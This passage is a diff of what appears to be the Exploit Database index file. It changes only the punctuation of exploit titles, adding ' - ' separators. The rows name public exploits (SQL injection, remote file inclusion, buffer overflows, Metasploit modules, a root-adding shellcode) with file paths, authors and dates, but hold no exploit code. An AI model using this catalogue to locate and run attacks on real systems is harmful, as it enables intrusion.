Laster",php,webapps,0 11784,platforms/php/webapps/11784.txt,"PostNuke FormExpress Module Blind SQL Injection",2010-03-17,"Ali Abbasi",php,webapps,0 11785,platforms/php/webapps/11785.txt,"Joomla Component com_ckforms - Multiple Vulnerabilities",2010-03-17,"ALTBTA ",php,webapps,0 11786,platforms/windows/local/11786.txt,"Virtual PC Hypervisor Memory Protection",2010-03-17,"Core Security",windows,local,0 @@ -10795,7 +10795,7 @@ id,file,description,date,author,platform,type,port 11805,platforms/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II Blind SQL Injection",2010-03-18,"Easy Laster",php,webapps,0 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Include Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 -11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed (SQL/XSS) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0 +11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - (SQL/XSS) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0 11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 - Pre-Authentication DoS (PoC)",2010-03-19,loneferret,windows,dos,21 11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 11811,platforms/php/webapps/11811.txt,"phpscripte24 Preisschlacht Liveshop System SQL Injection (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0 @@ -10877,7 +10877,7 @@ id,file,description,date,author,platform,type,port 11899,platforms/php/webapps/11899.html,"AdaptCMS_Lite_1.5 2009-07-07",2010-03-27,ITSecTeam,php,webapps,0 11900,platforms/windows/local/11900.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - (.pls) Universal Stack BoF",2010-03-27,mat,windows,local,0 11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multi Local File Include",2010-03-27,ITSecTeam,php,webapps,0 -11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 multi file include",2010-03-27,ITSecTeam,php,webapps,0 +11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - multi file include",2010-03-27,ITSecTeam,php,webapps,0 11904,platforms/php/webapps/11904.txt,"68kb multi Remote file include",2010-03-27,ITSecTeam,php,webapps,0 11905,platforms/php/webapps/11905.txt,"Simple Machines Forum (SMF) <= 1.1.8 - (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0 11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail <= 2.7.2 - Multiple Vulnerabilities",2010-03-27,"cp77fk4r ",php,webapps,0 @@ -11365,7 +11365,7 @@ id,file,description,date,author,platform,type,port 12455,platforms/php/webapps/12455.txt,"Ucenter Projekt 2.0 - Insecure crossdomain (XSS)",2010-04-29,indoushka,php,webapps,0 12456,platforms/php/webapps/12456.txt,"chCounter indirect SQL Injection and XSS Vulnerabilities",2010-04-29,Valentin,php,webapps,0 12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 - (Win32) CSS Remote Denial of Service Exploit",2010-04-29,ITSecTeam,windows,dos,0 -12458,platforms/php/webapps/12458.txt,"Scratcher (SQL/XSS) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0 +12458,platforms/php/webapps/12458.txt,"Scratcher - (SQL/XSS) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0 12459,platforms/php/webapps/12459.txt,"ec21 clone 3.0 - (id) SQL Injection",2010-04-30,v3n0m,php,webapps,0 12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection",2010-04-30,v3n0m,php,webapps,0 12461,platforms/php/webapps/12461.txt,"JobPost - SQLi",2010-04-30,Sid3^effects,php,webapps,0 @@ -11443,7 +11443,7 @@ id,file,description,date,author,platform,type,port 12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 12543,platforms/php/webapps/12543.rb,"Alibaba Clone <= 3.0 (Special) - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 12544,platforms/php/webapps/12544.rb,"Alibaba Clone Diamond Version - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 -12545,platforms/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 +12545,platforms/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 12546,platforms/windows/dos/12546.pl,"Hyplay 1.2.326.1 - (.asx) Local DoS Crash PoC",2010-05-10,"Steve James",windows,dos,0 12547,platforms/php/webapps/12547.txt,"e-webtech (new.asp?id=) SQL Injection",2010-05-10,protocol,php,webapps,0 12550,platforms/php/webapps/12550.pl,"Netvidade engine 1.0 - Multiple Vulnerabilities",2010-05-10,pwndomina,php,webapps,0 @@ -11478,7 +11478,7 @@ id,file,description,date,author,platform,type,port 12580,platforms/windows/remote/12580.txt,"miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0 12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0 12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0 -12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection",2010-05-12,FL0RiX,php,webapps,0 +12583,platforms/php/webapps/12583.txt,"e-webtech - (fixed_page.asp) SQL Injection",2010-05-12,FL0RiX,php,webapps,0 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload",2010-05-12,eidelweiss,php,webapps,0 12585,platforms/php/webapps/12585.txt,"4Images <= 1.7.7 - (image_utils.php) Remote Command Execution",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0 @@ -11642,7 +11642,7 @@ id,file,description,date,author,platform,type,port 12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0 12763,platforms/php/webapps/12763.txt,"Script Upload Up Your Shell (Sql Inject)",2010-05-27,MouDy-Dz,php,webapps,0 12766,platforms/php/webapps/12766.txt,"PPhlogger <= 2.2.5 - (trace.php) Remote Command Execution",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps,0 -12767,platforms/php/webapps/12767.txt,"parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0 +12767,platforms/php/webapps/12767.txt,"parlic Design - (SQL/XSS/HTML) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0 14321,platforms/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Buffer Overflow Exploit",2010-07-10,blake,windows,remote,0 12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps,0 12769,platforms/php/webapps/12769.txt,"Joomla Component MediQnA 1.1 - LFI",2010-05-27,kaMtiEz,php,webapps,0 @@ -11664,7 +11664,7 @@ id,file,description,date,author,platform,type,port 12788,platforms/php/webapps/12788.txt,"Marketing Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 12790,platforms/php/webapps/12790.txt,"Nucleus Plugin Twitter Remote File Inclusion",2010-05-29,AntiSecurity,php,webapps,0 12791,platforms/php/webapps/12791.txt,"Aim Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 -12792,platforms/php/webapps/12792.txt,"MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 +12792,platforms/php/webapps/12792.txt,"MileHigh Creative - (SQL/XSS/HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 12793,platforms/php/webapps/12793.txt,"Cosmos Solutions CMS SQL Injection",2010-05-29,cyberlog,php,webapps,0 12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS SQL Injection (id= / page=)",2010-05-29,gendenk,php,webapps,0 12796,platforms/php/webapps/12796.txt,"Joomla Component BF Quiz SQL Injection Exploit",2010-05-29,"Valentin Hoebel",php,webapps,0 @@ -11674,7 +11674,7 @@ id,file,description,date,author,platform,type,port 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0 12804,platforms/multiple/remote/12804.txt,"nginx http server <= 0.6.36 - Path Draversal",2010-05-30,"cp77fk4r ",multiple,remote,0 12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 -12806,platforms/php/webapps/12806.txt,"CMScout (XSS/HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 +12806,platforms/php/webapps/12806.txt,"CMScout - (XSS/HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 12807,platforms/php/webapps/12807.txt,"Creato Script SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0 12808,platforms/php/webapps/12808.txt,"PTC Site's RCE/XSS",2010-05-30,CrazyMember,php,webapps,0 12809,platforms/php/webapps/12809.txt,"Symphony CMS Local File Inclusion",2010-05-30,AntiSecurity,php,webapps,0 @@ -12326,7 +12326,7 @@ id,file,description,date,author,platform,type,port 13990,platforms/asp/webapps/13990.txt,"Boat Classifieds SQL Injection",2010-06-22,Sangteamtham,asp,webapps,0 13991,platforms/php/webapps/13991.txt,"Softbiz PHP FAQ Script Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 13992,platforms/php/webapps/13992.txt,"Pre PHP Classifieds SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 -13993,platforms/php/webapps/13993.txt,"k-search (SQL/XSS) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0 +13993,platforms/php/webapps/13993.txt,"k-search - (SQL/XSS) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0 14512,platforms/php/webapps/14512.txt,"Concept E-commerce SQL Injection",2010-07-31,gendenk,php,webapps,0 13995,platforms/asp/webapps/13995.txt,"Boat Classifieds (printdetail.asp?Id) SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0 13996,platforms/php/webapps/13996.txt,"Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection",2010-06-23,CoBRa_21,php,webapps,0 @@ -12834,7 +12834,7 @@ id,file,description,date,author,platform,type,port 14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) Remote SQL Injection",2010-08-14,LiquidWorm,php,webapps,0 14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdiskyou,windows,dos,0 14647,platforms/php/webapps/14647.php,"PHP-Fusion Local File Inclusion",2010-08-15,MoDaMeR,php,webapps,0 -14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0 +14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP - (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0 14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow",2010-08-15,dijital1,windows,local,0 14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple XSS/CSRF Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0 14654,platforms/php/webapps/14654.php,"CMSQLite <= 1.2 & CMySQLite <= 1.3.1 - Remote Code Execution Exploit",2010-08-15,BlackHawk,php,webapps,0 @@ -12971,7 +12971,7 @@ id,file,description,date,author,platform,type,port 14831,platforms/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow (SEH)",2010-08-29,"James Fitts",windows,local,0 14832,platforms/windows/dos/14832.rb,"SnackAmp 3.1.2 - (.wav) Buffer Overflow (PoC)",2010-08-29,"James Fitts",windows,dos,0 14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4 & 3.8.5 Registration Bypass",2010-08-29,"Immortal Boy",php,webapps,0 -14834,platforms/php/webapps/14834.txt,"Max's Guestbook (HTML Injection/XSS) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0 +14834,platforms/php/webapps/14834.txt,"Max's Guestbook - (HTML Injection/XSS) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0 14835,platforms/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusion Vulnerabilities",2010-08-29,JosS,php,webapps,0 14837,platforms/php/webapps/14837.txt,"CF Image Hosting Script 1.3.8 - Remote File Inclusion",2010-08-29,"FoX HaCkEr",php,webapps,0 14838,platforms/php/webapps/14838.txt,"Seagull 0.6.7 - SQL Injection",2010-08-29,Sweet,php,webapps,0 @@ -12980,7 +12980,7 @@ id,file,description,date,author,platform,type,port 14841,platforms/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion",2010-08-30,"FoX HaCkEr",php,webapps,0 14843,platforms/windows/dos/14843.txt,"Apple QuickTime '_Marshaled_pUnk' Backdoor Param Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta ",windows,dos,0 14845,platforms/php/webapps/14845.txt,"Joomla Component (com_picsell) Local File Disclosure",2010-08-30,Craw,php,webapps,0 -14846,platforms/php/webapps/14846.txt,"Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities",2010-08-31,"Chip d3 bi0s",php,webapps,0 +14846,platforms/php/webapps/14846.txt,"Joomla Component (com_jefaqpro) - Multiple Blind SQL Injection Vulnerabilities",2010-08-31,"Chip d3 bi0s",php,webapps,0 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass (0Day)",2010-09-01,Abysssec,php,webapps,0 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0 @@ -13108,7 +13108,7 @@ id,file,description,date,author,platform,type,port 15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos,0 15037,platforms/php/webapps/15037.html,"CMSimple - CSRF",2010-09-18,Abysssec,php,webapps,0 15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection 'reviews.php'",2010-09-18,secret,php,webapps,0 -15040,platforms/php/webapps/15040.txt,"Joomla Component (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0 +15040,platforms/php/webapps/15040.txt,"Joomla Component - (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0 15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download",2010-09-18,mr_me,php,webapps,0 15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0 15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop Multiple SQL Injection",2010-09-19,secret,php,webapps,0 @@ -13212,7 +13212,7 @@ id,file,description,date,author,platform,type,port 15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal",2010-10-02,m0ebiusc0de,ios,remote,0 15188,platforms/ios/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,ios,dos,0 15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x - (7.2.3925) LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0 -15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret (SQL/XSS) Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0 +15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret - (SQL/XSS) Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0 15194,platforms/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload",2010-10-03,Hackeri-AL,php,webapps,0 15200,platforms/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection",2010-10-04,cyb3r.anbu,php,webapps,0 15201,platforms/windows/local/15201.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH DEP Bypass)",2010-10-04,"Muhamad Fadzil Ramli",windows,local,0 @@ -13693,7 +13693,7 @@ id,file,description,date,author,platform,type,port 15770,platforms/php/webapps/15770.txt,"Download Center 2.2 - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 15771,platforms/php/webapps/15771.txt,"SchuldnerBeratung SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 15772,platforms/php/webapps/15772.txt,"PayPal Shop Digital SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 -15773,platforms/php/webapps/15773.txt,"Projekt Shop (details.php) Multiple SQL Injection Vulnerabilities",2010-12-18,"DeadLy DeMon",php,webapps,0 +15773,platforms/php/webapps/15773.txt,"Projekt Shop - (details.php) Multiple SQL Injection Vulnerabilities",2010-12-18,"DeadLy DeMon",php,webapps,0 15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 - ACPI custom_method Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0 15775,platforms/php/webapps/15775.txt,"Mafia Game Script SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 15776,platforms/asp/webapps/15776.pl,"Virtual Store Open 3.0 Acess SQL Injection",2010-12-18,Br0ly,asp,webapps,0 @@ -13868,7 +13868,7 @@ id,file,description,date,author,platform,type,port 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - (.wav) Buffer Overflow Exploit",2011-01-18,h1ch4m,windows,local,0 16010,platforms/php/webapps/16010.txt,"allCineVid Joomla Component 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0 -16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 - / 1.2.8 unserialize()",2011-01-18,felix,php,webapps,0 +16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 / 1.2.8 - unserialize()",2011-01-18,felix,php,webapps,0 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Remote Admin Add CSRF Exploit",2011-01-18,anT!-Tr0J4n,php,webapps,0 16014,platforms/windows/remote/16014.html,"Novell iPrint <= 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0 17209,platforms/php/webapps/17209.txt,"SoftMP3 SQL Injection",2011-04-24,mArTi,php,webapps,0 @@ -14001,7 +14001,7 @@ id,file,description,date,author,platform,type,port 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Remote BoF (Post Auth)",2011-02-16,chap0,windows,remote,0 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 -16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 +16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - (.csv) Denial of Service",2011-02-17,b0telh0,windows,dos,0 16181,platforms/php/webapps/16181.txt,"WordPress User Photo Component - Remote File Upload",2011-02-17,ADVtools,php,webapps,0 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 - grapheme_extract() NULL Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0 @@ -14126,7 +14126,7 @@ id,file,description,date,author,platform,type,port 16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd Heap Overflow",2010-04-30,Metasploit,solaris_sparc,remote,0 16324,platforms/multiple/remote/16324.rb,"Solaris sadmind Command Execution",2010-06-22,Metasploit,multiple,remote,0 16325,platforms/solaris/remote/16325.rb,"Sun Solaris sadmind adm_build_path() Buffer Overflow",2010-07-03,Metasploit,solaris,remote,0 -16326,platforms/solaris/remote/16326.rb,"Solaris ypupdated Command Execution",2010-07-25,Metasploit,solaris,remote,0 +16326,platforms/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution",2010-07-25,Metasploit,solaris,remote,0 16327,platforms/solaris/remote/16327.rb,"Solaris in.telnetd TTYPROMPT Buffer Overflow",2010-06-22,Metasploit,solaris,remote,0 16328,platforms/solaris/remote/16328.rb,"Sun Solaris Telnet Remote Authentication Bypass",2010-06-22,Metasploit,solaris,remote,0 16329,platforms/solaris/remote/16329.rb,"Samba lsa_io_trans_names Heap Overflow (Solaris)",2010-04-05,Metasploit,solaris,remote,0 @@ -14699,7 +14699,7 @@ id,file,description,date,author,platform,type,port 16897,platforms/php/webapps/16897.rb,"BASE - base_qry_common Remote File Include",2010-11-24,Metasploit,php,webapps,0 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,Metasploit,php,webapps,0 16901,platforms/php/webapps/16901.rb,"PAJAX Remote Command Execution",2010-04-30,Metasploit,php,webapps,0 -16902,platforms/php/webapps/16902.rb,"CakePHP <= 1.3.5 - / 1.2.8 Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0 +16902,platforms/php/webapps/16902.rb,"CakePHP <= 1.3.5 / 1.2.8 - Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0 16903,platforms/php/remote/16903.rb,"OpenX banner-edit.php File Upload PHP Code Execution",2010-09-20,Metasploit,php,remote,0 16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion",2011-01-08,Metasploit,php,webapps,0 16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) - configdir Remote Command Execution",2009-12-26,Metasploit,cgi,webapps,0 @@ -15679,7 +15679,7 @@ id,file,description,date,author,platform,type,port 18047,platforms/php/webapps/18047.txt,"JEEMA Sms 3.2 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18048,platforms/php/webapps/18048.txt,"Vik Real Estate 1.0 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0 -18050,platforms/php/webapps/18050.txt,"Joomla HM-Community (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 +18050,platforms/php/webapps/18050.txt,"Joomla HM-Community - (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 18051,platforms/windows/remote/18051.txt,"BroadWin WebAccess SCADA/HMI Client Remote Code Execution",2011-10-31,Snake,windows,remote,0 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC",2011-10-31,rgod,windows,dos,0 18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress <= 3.1.4 - Stored XSS",2011-10-31,"Paul Loftness",php,webapps,0 @@ -15770,7 +15770,7 @@ id,file,description,date,author,platform,type,port 18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) _rOOt_ with password _pwn3d_ shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 18165,platforms/windows/dos/18165.txt,"siemens automation license manager <= 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 -18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 +18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin (0Day)",2011-11-28,Alberto_García_Illera,php,webapps,0 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine Remote Code Execution",2011-11-30,Metasploit,multiple,remote,0 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 / 4300 - Command Execution",2011-11-30,Metasploit,hardware,remote,0 @@ -15809,7 +15809,7 @@ id,file,description,date,author,platform,type,port 18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin SQL Injection",2011-12-07,CrazyMouse,php,webapps,0 18213,platforms/php/webapps/18213.php,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0 18214,platforms/php/webapps/18214.py,"SMF <= 2.0.1 - SQL Injection & Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 -18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products File Project Handling Stack Buffer Overflow PoC",2011-12-09,modpr0be,windows,dos,0 +18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products - File Project Handling Stack Buffer Overflow PoC",2011-12-09,modpr0be,windows,dos,0 18221,platforms/linux/dos/18221.c,"Apache HTTP Server Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 18222,platforms/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection",2011-12-09,Don,php,webapps,0 18223,platforms/windows/dos/18223.pl,"Free Opener Local Denial of Service",2011-12-09,"Iolo Morganwg",windows,dos,0 @@ -17076,7 +17076,7 @@ id,file,description,date,author,platform,type,port 19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 IMonitor status.cgi DoS",2000-01-05,"Ussr Labs",windows,dos,0 19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE",2000-01-04,anonymous,multiple,remote,0 19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - search.cgi Directory Traversal",2000-01-03,"k0ad k1d",cgi,remote,0 -40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB Code Execution",2016-07-11,Metasploit,ruby,remote,80 +40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution",2016-07-11,Metasploit,ruby,remote,80 19715,platforms/php/webapps/19715.txt,"WordPress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0 19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,Metasploit,java,remote,0 @@ -17591,8 +17591,8 @@ id,file,description,date,author,platform,type,port 20255,platforms/windows/dos/20255.txt,"Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS",2000-10-03,"BindView's Razor Team",windows,dos,0 20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x fstat Format String",2000-10-04,K2,openbsd,local,0 20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0 -20258,platforms/multiple/remote/20258.c,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0 -20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (2)",1994-02-07,anonymous,multiple,remote,0 +20258,platforms/multiple/remote/20258.c,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0 +20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (2)",1994-02-07,anonymous,multiple,remote,0 20260,platforms/php/webapps/20260.txt,"Islamnt Islam Forum Script 1.2 - Blind SQL Injection Exploit",2012-08-05,s3n4t00r,php,webapps,0 20543,platforms/windows/local/20543.rb,"Windows Service Trusted Path Privilege Escalation",2012-08-15,Metasploit,windows,local,0 20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload",2012-08-15,Metasploit,php,remote,0 @@ -17798,7 +17798,7 @@ id,file,description,date,author,platform,type,port 